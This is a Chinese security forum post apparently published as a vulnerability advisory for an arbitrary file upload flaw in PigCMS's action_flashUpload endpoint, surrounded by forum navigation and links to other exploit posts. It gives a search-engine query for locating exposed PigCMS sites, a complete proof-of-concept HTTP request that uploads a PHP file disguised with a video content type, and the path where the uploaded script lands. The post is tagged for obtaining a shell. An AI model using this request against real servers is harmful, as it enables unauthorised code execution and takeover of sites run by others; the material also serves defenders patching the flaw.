登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
签到
每天签到奖励2-10圆
导读
排行榜
TG频道
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
VIP申请
VIP网盘
网盘
联系我们
发帖说明
每日签到
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
昨天 20:07
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
域渗透指南
某路由器二进制漏洞挖掘过程
漏洞解析--XSS 从入门到精通!
若依(RuoYi)框架漏洞总结
精准定位文件包含漏洞:代码审计中的实战思维
安全攻防丨反序列化漏洞的实操演练
浙大恩特前台RCE漏洞审计
PbootCMS domain SQL注入漏洞
CmsEasy crossall_act.php SQL注入漏洞
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
域渗透指南
0
761
琶轮
2025-09-26
安全
某路由器二进制漏洞挖掘过程
1
332
荏牌
2025-09-28
业界
漏洞解析--XSS 从入门到精通!
1
595
越蔓蔓
2025-10-01
安全
若依(RuoYi)框架漏洞总结
0
583
麓吆
2025-10-01
安全
精准定位文件包含漏洞:代码审计中的实战思维
2
830
别萧玉
2025-10-06
安全
安全攻防丨反序列化漏洞的实操演练
0
862
袋岖荤
2025-10-11
安全
浙大恩特前台RCE漏洞审计
0
585
倡遍竽
2025-10-15
程序
PbootCMS domain SQL注入漏洞
0
6
anyue1937
2025-10-15
程序
CmsEasy crossall_act.php SQL注入漏洞
0
4
anyue1937
2025-10-15
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
发帖
anyue1937
昨天 20:07
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994893
dage888
999994
3934307807
993178
4
富账慕
9992
5
邹语彤
9991
6
刎唇
9993
7
聚怪闩
9972
8
匝抽
9986
9
烯八
9963
10
筒濂
9974
查看更多